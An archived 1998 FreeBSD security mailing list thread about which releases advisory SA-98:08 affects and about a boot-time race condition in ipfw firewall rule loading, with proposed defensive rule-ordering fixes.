MAA00828 for freebsd-security-outgoing; Wed, 4 Nov 1998 12:44:50 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gvr.gvr.org (gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA00797; Wed, 4 Nov 1998 12:44:33 -0800 (PST) (envelope-from guido@gvr.org) Received: (from guido@localhost) by gvr.gvr.org (8.8.8/8.8.5) id VAA13432; Wed, 4 Nov 1998 21:44:12 +0100 (MET) Message-ID: <19981104214411.A13413@gvr.org> Date: Wed, 4 Nov 1998 21:44:11 +0100 
From: Guido van Rooij To: sthaug@nethelp.no, security-officer@FreeBSD.ORG Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment References: <199811041937.UAA12845@gvr.gvr.org> <11126.910211688@verdi.nethelp.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <11126.910211688@verdi.nethelp.no>; from sthaug@nethelp.no on Wed, Nov 04, 1998 at 09:34:48PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 04, 1998 at 09:34:48PM +0100, sthaug@nethelp.no wrote: > > Please note that the fragment and fragment.asc files in the SA-98:08 > directory are in reality the rst-current and rst-current.asc from > SA-98:07. You probably want to change this. > Yikes! Thanks for the notice... I've corrected it now. -Guido To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 13:24:15 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA08124 for freebsd-security-outgoing; Wed, 4 Nov 1998 13:24:15 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from nefertiti.lightningweb.com (nefertiti.lightningweb.com [198.68.191.157]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA08104 for ; Wed, 4 Nov 1998 13:24:09 -0800 (PST) (envelope-from keith@lightningweb.com) Received: from localhost (keith@localhost) by nefertiti.lightningweb.com (8.8.7/8.8.5) with SMTP id NAA08418 for ; Wed, 4 Nov 1998 13:25:11 -0800 (PST) Date: Wed, 4 Nov 1998 13:25:10 -0800 (PST) 
From: Keith Woodman To: freebsd-security@FreeBSD.ORG Subject: ip_input.c Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I have a mail regarding the ip_input.c bug that has a patch out now. I am rather new and am running 2.2.5-RELEASE. I hope to clear up several questions here.

1) What are the differences between -current, -stable and -RELEASE?

2) Since I am running a server with 2.2.5-RELEASE, does this needed patch apply to me?

3) How do I implement the patch? patch ip_input.c patch_source ????

Thanks for the help.
Keith W.

----------------------------------------------------------------------
Keith Woodman Technical Coordinator Keith@lightningweb.com Lightningweb LLC
pid 7962 (sniffit), uid 0: exited on signal 10 (core dumped)
----------------------------------------------------------------------

From owner-freebsd-security Wed Nov 4 14:07:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA15033 for freebsd-security-outgoing; Wed, 4 Nov 1998 14:07:16 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA15026 for ; Wed, 4 Nov 1998 14:07:13 -0800 (PST) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) id OAA18756; Wed, 4 Nov 1998 14:06:44 -0800 (PST) Message-ID: <19981104140643.A17685@best.com> Date: Wed, 4 Nov 1998 14:06:43 -0800
From: "Jan B. Koum " To: Keith Woodman , freebsd-security@FreeBSD.ORG Subject: Re: ip_input.c References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Keith Woodman on Wed, Nov 04, 1998 at 01:25:10PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 04, 1998 at 01:25:10PM -0800, Keith Woodman wrote: > I have a mail regarding the ip_input.c bug that has a patch out now. > I am rather new and am running 2.2.5 - RELEASE. > I hope to clear up several questions here. > > 1) What are the differences between. -current -stable -RELEASE ?? > > 2) Since I am running a server with 2.2.5 -RELEASE, does this needed patch > apply to me? > > 3) How do I implement the patch? patch ip_input.c patch_source ???? > > Thanks for the help. > Keith W. > > > ---------------------------------------------------------------------- > > Keith Woodman Technical Coordinator > Keith@lightningweb.com Lightningweb LLC > > > pid 7962 (sniffit), uid 0: exited on signal 10 (core dumped) > ---------------------------------------------------------------------- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message If you read the advisory, it say: Affects: FreeBSD 3.0 and FreeBSD-current before the correction date. Are you running 3.0 or -current? No. The 2.2 branch is not affected at all. -- Yan I don't have the password .... + Jan Koum But the path is chainlinked .. | Spelled Jan, pronounced Yan. There. So if you've got the time .... | Web: http://www.best.com/~jkb Set the tone to sync ......... 
+ OS: http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 14:52:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA23064 for freebsd-security-outgoing; Wed, 4 Nov 1998 14:52:58 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA23055; Wed, 4 Nov 1998 14:52:44 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id PAA21704; Wed, 4 Nov 1998 15:52:33 -0700 (MST) Message-Id: <4.1.19981104155202.042f8dc0@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Wed, 04 Nov 1998 15:52:29 -0700 To: Guido van Rooij , sthaug@nethelp.no, security-officer@FreeBSD.ORG 
From: Brett Glass Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment Cc: security@FreeBSD.ORG In-Reply-To: <19981104214411.A13413@gvr.org> References: <11126.910211688@verdi.nethelp.no> <199811041937.UAA12845@gvr.gvr.org> <11126.910211688@verdi.nethelp.no> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does this problem affect 2.2.7-RELEASE? --Brett At 09:44 PM 11/4/98 +0100, Guido van Rooij wrote: >On Wed, Nov 04, 1998 at 09:34:48PM +0100, sthaug@nethelp.no wrote: >> >> Please note that the fragment and fragment.asc files in the SA-98:08 >> directory are in reality the rst-current and rst-current.asc from >> SA-98:07. You probably want to change this. >> > >Yikes! > >Thanks for the notice... >I've corrected it now. > >-Guido > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 14:57:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA24240 for freebsd-security-outgoing; Wed, 4 Nov 1998 14:57:38 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id OAA24233 for ; Wed, 4 Nov 1998 14:57:36 -0800 (PST) (envelope-from sthaug@nethelp.no) 
From: sthaug@nethelp.no Received: (qmail 13466 invoked by uid 1001); 4 Nov 1998 22:57:24 +0000 (GMT) To: brett@lariat.org Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment In-Reply-To: Your message of "Wed, 04 Nov 1998 15:52:29 -0700" References: <4.1.19981104155202.042f8dc0@127.0.0.1> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Wed, 04 Nov 1998 23:57:24 +0100 Message-ID: <13464.910220244@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Does this problem affect 2.2.7-RELEASE? How about reading the advisory? It says specifically, Affects: FreeBSD 3.0 and FreeBSD-current before the correction date. In other words, it doesn't affect 2.2.7-RELEASE. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 15:35:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA00722 for freebsd-security-outgoing; Wed, 4 Nov 1998 15:35:04 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA00701 for ; Wed, 4 Nov 1998 15:35:01 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id QAA22169; Wed, 4 Nov 1998 16:34:42 -0700 (MST) Message-Id: <4.1.19981104161923.041424e0@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Wed, 04 Nov 1998 16:20:11 -0700 To: sthaug@nethelp.no 
From: Brett Glass Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment Cc: security@FreeBSD.ORG In-Reply-To: <13464.910220244@verdi.nethelp.no> References: <4.1.19981104155202.042f8dc0@127.0.0.1> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:57 PM 11/4/98 +0100, sthaug@nethelp.no wrote: >> Does this problem affect 2.2.7-RELEASE? > >How about reading the advisory? It says specifically, > >Affects: FreeBSD 3.0 and > FreeBSD-current before the correction date. > >In other words, it doesn't affect 2.2.7-RELEASE. I read the advisory. Often, problems cover other versions as well as the one(s) mentioned. And, since I'm paranoid, I think it's important to ask. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 15:46:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA03059 for freebsd-security-outgoing; Wed, 4 Nov 1998 15:46:34 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA03048 for ; Wed, 4 Nov 1998 15:46:31 -0800 (PST) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id PAA16485; Wed, 4 Nov 1998 15:46:43 -0800 (PST) (envelope-from jkh@time.cdrom.com) To: Brett Glass cc: sthaug@nethelp.no, security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment In-reply-to: Your message of "Wed, 04 Nov 1998 16:20:11 MST." <4.1.19981104161923.041424e0@127.0.0.1> Date: Wed, 04 Nov 1998 15:46:43 -0800 Message-ID: <16481.910223203@time.cdrom.com> 
From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I read the advisory. Often, problems cover other versions as > well as the one(s) mentioned. And, since I'm paranoid, I Security advisories are generally very careful to mention *every* version covered, an advisory having little value if this piece of information is not accurate. It also avoids a flood of unnecessary "is my release affected?!" messages. :-) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 17:30:35 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA19470 for freebsd-security-outgoing; Wed, 4 Nov 1998 17:30:35 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA19457 for ; Wed, 4 Nov 1998 17:30:18 -0800 (PST) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id UAA04608; Wed, 4 Nov 1998 20:29:58 -0500 (EST) Date: Wed, 4 Nov 1998 20:29:56 -0500 (EST) 
From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: Robert Watson cc: freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet sneaks by deny all rule? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Wed, 4 Nov 1998, Robert Watson wrote:
> Chris,
>
> My guess it is a race condition. The packet arrived between when your
> network interface went up, and the ruleset was added. Because your
> default policy is deny, it worked fine. However, this does actually bring
> interesting risks to mind: as long as the rules are added in numeric
> order, and the default policy is deny, you should always get consistent
> (if overly draconian) policy during bootup. However, if you have your
> ipfw lines not in the rule order, then some allows might be installed in
> the list of rules *before* the denies that precede them. In this
> situation, the race condition would allow a packet in that should not have
> been allowed in. The whole effect is because the installation of ipfw
> rules is non-atomic.
>
> I wondered for a while about the same thing on some of my systems.

That is what is happening: as the machine comes up, but before the ipfw rules are loaded, it's receiving packets. Good thing the kernel has the deny all rule in it in addition to my deny all rule, or those packets would be sneaking by. I'm assuming anyway that the default deny all policy is catching ALL the packets that slip through BEFORE my rules have a chance to load?

Maybe a note should be added to the ipfw man page stating that if you set the default policy to open in the kernel there is a small window, between when you reboot your machine and when your ipfw rules load, in which packets will get through? I'm glad I noticed this now, and without having two deny all rules I never would have. I'll have to think about this one.
Chris -- "You both seem to be ignoring the fact that the networking market is driven by so-called 'IT professionals' these days, most of whom can't tell the difference between an ARP and a carp." --Wes Peters ===================================| Open Systems FreeBSD Consulting. FreeBSD 3.0 is available now! | Phone: (402)573-9124 / ICQ # 20016186 -----------------------------------| 3335 N. 103 Plaza, Omaha, NE 68134 FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting, Network Engineering, Security ===================================| http://open-systems.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 00:26:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA03891 for freebsd-security-outgoing; Thu, 5 Nov 1998 00:26:57 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gvr.gvr.org (gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA03858; Thu, 5 Nov 1998 00:26:42 -0800 (PST) (envelope-from guido@gvr.org) Received: (from guido@localhost) by gvr.gvr.org (8.8.8/8.8.5) id JAA15969; Thu, 5 Nov 1998 09:26:21 +0100 (MET) Message-ID: <19981105092621.A15959@gvr.org> Date: Thu, 5 Nov 1998 09:26:21 +0100 
From: Guido van Rooij To: Brett Glass , sthaug@nethelp.no, security-officer@FreeBSD.ORG Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment References: <11126.910211688@verdi.nethelp.no> <199811041937.UAA12845@gvr.gvr.org> <11126.910211688@verdi.nethelp.no> <19981104214411.A13413@gvr.org> <4.1.19981104155202.042f8dc0@127.0.0.1> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <4.1.19981104155202.042f8dc0@127.0.0.1>; from Brett Glass on Wed, Nov 04, 1998 at 03:52:29PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 04, 1998 at 03:52:29PM -0700, Brett Glass wrote: > Does this problem affect 2.2.7-RELEASE? > No. -Guido To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 01:24:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA10826 for freebsd-security-outgoing; Thu, 5 Nov 1998 01:24:12 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA10811 for ; Thu, 5 Nov 1998 01:24:09 -0800 (PST) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id EAA12255 for ; Thu, 5 Nov 1998 04:24:02 -0500 (EST) Date: Thu, 5 Nov 1998 04:24:00 -0500 (EST) 
From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: freebsd-security@FreeBSD.ORG Subject: Amazing wonder packet Part 2. In-Reply-To: <19981104112352.B4776@mcs.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Ok, someone sent me this so I thought I would run it by the list. I'll quote the message here:

"seeing how /etc/rc.firewall is a shell script, it is reasonable to assume that most rulesets will include small raceable sections where some packets that should be denied will not be. I kludged as below: put a '$fwcmd add 1 deny all from any to any' as the first rule and moved the flush command to one line above it. put a '$fwcmd delete 1' right after my 65534 deny all. This should cut the available time for races down substantially. I've seen packets hit the temporary rule but have never seen a magic packet that made it to the last."

What do you guys think about this as a possible solution/hack? Short of tearing up ipfw, which I don't have the time to do, can anyone see this having more negative actions rather than positive ones? I'm not really sure what else one could do.

Chris

-- "You both seem to be ignoring the fact that the networking market is driven by so-called 'IT professionals' these days, most of whom can't tell the difference between an ARP and a carp." --Wes Peters ===================================| Open Systems FreeBSD Consulting. FreeBSD 3.0 is available now! | Phone: (402)573-9124 / ICQ # 20016186 -----------------------------------| 3335 N. 103 Plaza, Omaha, NE 68134 FreeBSD: The power to serve!
| E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting, Network Engineering, Security ===================================| http://open-systems.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 5 03:10:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA22853 for freebsd-security-outgoing; Thu, 5 Nov 1998 03:10:49 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (p30-max1.wlg.ihug.co.nz [209.78.48.94]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA22848 for ; Thu, 5 Nov 1998 03:10:45 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.8/8.8.7) with SMTP id AAA20901; Fri, 6 Nov 1998 00:09:28 +1300 (NZDT) (envelope-from andrew@squiz.co.nz) Date: Fri, 6 Nov 1998 00:09:28 +1300 (NZDT) 
From: Andrew McNaughton
X-Sender: andrew@aniwa.sky
Reply-To: andrew@squiz.co.nz
To: Open Systems Networking
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Amazing wonder packet Part 2.
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

There was an earlier post that covered this which I think you haven't read or haven't understood.

Assuming that the default policy is to deny all and assuming that rules are added in numerical order, the result of any rule being missing can only be to deny the packet, which should be safe for most purposes.

In most cases there's no problem for your solution.

I considered building a wrapper for ipfw to simplify firewall specification and allow for some automated dynamic manipulation of the rule table. If you are doing something like this then it might mean that it was easier to do as you suggest than to guarantee that rules be added in numerical order. Probably ipfw is not the building block you'd choose though.

Andrew McNaughton

On Thu, 5 Nov 1998, Open Systems Networking wrote:

> Date: Thu, 5 Nov 1998 04:24:00 -0500 (EST)
> From: Open Systems Networking
> To: freebsd-security@FreeBSD.ORG
> Subject: Amazing wonder packet Part 2.
>
>
> Ok, someone sent me this so I thought I would run it by the list. I'll quote
> the message here:
>
> "seeing how /etc/rc.firewall is a shell script, it is reasonable to assume
> that most rulesets will include small raceable sections where some packets
> that should be denied will not be. I kludged as below:
>
> put a '$fwcmd add 1 deny all from any to any' as the first rule and moved
> the flush command to one line above it.
>
> put a '$fwcmd delete 1' right after my 65534 deny all.
>
> This should cut the available time for races down substantially. I've seen
> packets hit the temporary rule but have never seen a magic packet that
> made it to the last."
>
> What do you guys think about this as a possible solution/hack?
> Short of tearing up ipfw, which I don't have the time to do, can anyone see
> this having more negative actions rather than positive ones?
> I'm not really sure what else one could do.
>
> Chris
>
> --
> "You both seem to be ignoring the fact that the networking market is
> driven by so-called 'IT professionals' these days, most of whom can't
> tell the difference between an ARP and a carp." --Wes Peters
>
> ===================================| Open Systems FreeBSD Consulting.
> FreeBSD 3.0 is available now!      | Phone: (402)573-9124 / ICQ # 20016186
> -----------------------------------| 3335 N. 103 Plaza, Omaha, NE 68134
> FreeBSD: The power to serve!       | E-Mail: opsys@open-systems.net
> http://www.freebsd.org             | Consulting, Network Engineering, Security
> ===================================| http://open-systems.net
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 03:24:59 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA24325 for freebsd-security-outgoing; Thu, 5 Nov 1998 03:24:59 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail.webspan.net (mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA24318 for ; Thu, 5 Nov 1998 03:24:57 -0800 (PST) (envelope-from opsys@mail.webspan.net)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id GAA04595; Thu, 5 Nov 1998 06:24:45 -0500 (EST)
Date: Thu, 5 Nov 1998 06:24:43 -0500 (EST)
From: Open Systems Networking
X-Sender: opsys@orion.webspan.net
To: Andrew McNaughton
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Amazing wonder packet Part 2.
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 6 Nov 1998, Andrew McNaughton wrote:

>
>
> There was an earlier post that covered this which I think you haven't read
> or haven't understood.
>
> Assuming that the default policy is to deny all and assuming that rules
> are added in numerical order, the result of any rule being missing can
> only be to deny the packet, which should be safe for most purposes.
>
> In most cases there's no problem for your solution.

No, my solution is solved, as Robert said, by just having the default policy to deny all, and having my rules numerically ordered as they are now. The point of my post was a solution I was mailed that implemented what Robert said in the last part: to have rule one deny everything and then remove it when the rules have loaded. This is a fix for those with a policy of default to open in the kernel. My solution is fine since I have deny all as my default policy and a deny all as my last rule, which should guarantee that my policies are carried out and that nothing sneaks by. I was merely asking if this person's solution is what Robert was thinking for those that have a default policy of open, and if it was implemented right, because most people are not aware of this race condition at all. And I plan on adding this fix to my pages for those who have a default policy to open, so they get the same warm fuzzy feeling as I do with a closed default policy. I just wanted to make sure that the fix I just posted was what Robert was talking about and to make sure the solution I posted was on par with what Robert said. That's all. I'm pretty sure it is, but wanted to double check.

Chris

--
"You both seem to be ignoring the fact that the networking market is driven by so-called 'IT professionals' these days, most of whom can't tell the difference between an ARP and a carp." --Wes Peters

===================================| Open Systems FreeBSD Consulting.
FreeBSD 3.0 is available now!      | Phone: (402)573-9124 / ICQ # 20016186
-----------------------------------| 3335 N. 103 Plaza, Omaha, NE 68134
FreeBSD: The power to serve!       | E-Mail: opsys@open-systems.net
http://www.freebsd.org             | Consulting, Network Engineering, Security
===================================| http://open-systems.net

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 03:47:48 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA26473 for freebsd-security-outgoing; Thu, 5 Nov 1998 03:47:48 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from aniwa.sky (p30-max1.wlg.ihug.co.nz [209.78.48.94]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA26466 for ; Thu, 5 Nov 1998 03:47:41 -0800 (PST) (envelope-from andrew@squiz.co.nz)
Received: from localhost (andrew@localhost) by aniwa.sky (8.8.8/8.8.7) with SMTP id AAA21220; Fri, 6 Nov 1998 00:46:52 +1300 (NZDT) (envelope-from andrew@squiz.co.nz)
Date: Fri, 6 Nov 1998 00:46:52 +1300 (NZDT)
From: Andrew McNaughton
X-Sender: andrew@aniwa.sky
Reply-To: andrew@squiz.co.nz
To: Open Systems Networking
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Amazing wonder packet Part 2.
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 5 Nov 1998, Open Systems Networking wrote:

> Date: Thu, 5 Nov 1998 06:24:43 -0500 (EST)
> From: Open Systems Networking
> To: Andrew McNaughton
> Cc: freebsd-security@FreeBSD.ORG
> Subject: Re: Amazing wonder packet Part 2.
>
> On Fri, 6 Nov 1998, Andrew McNaughton wrote:
>
> >
> >
> > There was an earlier post that covered this which I think you haven't read
> > or haven't understood.
> >
> > Assuming that the default policy is to deny all and assuming that rules
> > are added in numerical order, the result of any rule being missing can
> > only be to deny the packet, which should be safe for most purposes.
> >
> > In most cases there's no problem for your solution.
>
> No, my solution is solved, as Robert said, by just having the default policy
> to deny all, and having my rules numerically ordered as they are now.
> The point of my post was a solution I was mailed that implemented what
> Robert said in the last part: to have rule one deny everything and then
> remove it when the rules have loaded. This is a fix for those with a
> policy of default to open in the kernel. My solution is fine since I have
> deny all as my default policy and a deny all as my last rule, which should
> guarantee that my policies are carried out and that nothing sneaks by.
> I was merely asking if this person's solution is what Robert was thinking
> for those that have a default policy of open, and if it was implemented
> right, because most people are not aware of this race condition at all.
> And I plan on adding this fix to my pages for those who have a default
> policy to open, so they get the same warm fuzzy feeling as I do with a
> closed default policy. I just wanted to make sure that the fix I just
> posted was what Robert was talking about and to make sure the
> solution I posted was on par with what Robert said. That's all.
> I'm pretty sure it is, but wanted to double check.

If you have a default to open in the kernel then what you suggest does not solve the problem.

There's a window between the interface being brought up and the execution of rc.firewall which is going to be vulnerable regardless of what's in rc.firewall.

If you're using ipfw as a firewall then you shouldn't be defaulting to open. Defaulting to open is appropriate if you're just using it for traffic counting, or address translation without an assumption that security is provided.

root@aniwa# ipfw add 54321 deny all from any to any via ep1
ipfw: warning: interface ``ep1'' does not exist
54321 deny ip from any to any via ep1
root@aniwa# ipfw show
[...]
54321 0 0 deny ip from any to any via ep1
[...]

Looks like rc.firewall could be run _before_ the interfaces are set up. The warnings could be annoying though.

Andrew

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Nov 5 04:07:28 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA00965 for freebsd-security-outgoing; Thu, 5 Nov 1998 04:07:28 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail.webspan.net (mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA00960 for ; Thu, 5 Nov 1998 04:07:26 -0800 (PST) (envelope-from opsys@mail.webspan.net)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id HAA13505; Thu, 5 Nov 1998 07:07:14 -0500 (EST)
Date: Thu, 5 Nov 1998 07:07:13 -0500 (EST)
From: Open Systems Networking
X-Sender: opsys@orion.webspan.net
To: Andrew McNaughton
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Amazing wonder packet Part 2.
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Ok, it's late. I re-read the post about this and now I grok the whole point behind the comment:

"However, if you have your ipfw lines not in the rule order, then some allows might be installed in the list of rules *before* the denies that precede them. In this situation, the race condition would allow a packet in that should not have been allowed in."

The fix was intended for this. And that's exactly what it fixes. I think I can go to bed now.

Chris

--
"You both seem to be ignoring the fact that the networking market is driven by so-called 'IT professionals' these days, most of whom can't tell the difference between an ARP and a carp." --Wes Peters

===================================| Open Systems FreeBSD Consulting.
FreeBSD 3.0 is available now!      | Phone: (402)573-9124 / ICQ # 20016186
